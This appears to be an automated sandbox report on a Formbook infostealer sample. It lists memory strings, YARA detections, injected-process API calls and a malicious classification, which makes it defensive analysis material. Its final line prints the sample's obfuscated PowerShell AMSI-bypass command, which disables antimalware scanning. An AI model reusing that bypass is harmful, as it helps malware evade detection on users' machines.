          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49711 version: TLS 1.2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Very long command line foundShow sources
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: Commandline size = 4201
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: Commandline size = 4201
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00419D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00419E00 NtReadFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00419E80 NtClose,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00419F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00419D4B NtCreateFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00419DFB NtReadFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00419E4A NtClose,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00419E7A NtClose,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033EA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033EB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033EA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033EA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9FE0 NtCreateMutant,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033EAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ACA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ACA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ACA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ACB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ACAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B9D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B9E00 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B9E80 NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B9F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B9D4B NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B9DFB NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B9E4A NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B9E7A NtClose,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041D84E
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041E066
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00401030
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041E94D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041D1F1
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041DA23
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041DB36
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00402D89
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00402D90
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041BE22
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00409E30
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00402FB0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03472B28
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DEBB0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034722AE
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C4120
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AF900
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461002
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D20A0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BB090
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034720A8
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03471FF1
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C6E30
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03472EF7
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03471D55
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A0D20
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03472D07
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D2581
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BD5E0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA6E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABEBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9B090
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41002
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A80D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8F900
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B51D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BD84E
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BE066
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BE94D
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BDA23
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BDB36
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001A2D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001A2D89
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001A9E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BBE22
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001A2FB0
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 033AB150 appears 35 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 02A8B150 appears 32 times
          Source: s2rsXUiUn8.exeStatic PE information: Number of sections : 11 > 10
          Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/6@5/2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210722Jump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_01
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pghm4uj.4m1.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: s2rsXUiUn8.exeMetadefender: Detection: 17%
          Source: s2rsXUiUn8.exeReversingLabs: Detection: 57%
          Source: unknownProcess created: C:\Users\user\Desktop\s2rsXUiUn8.exe 'C:\Users\user\Desktop\s2rsXUiUn8.exe'
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 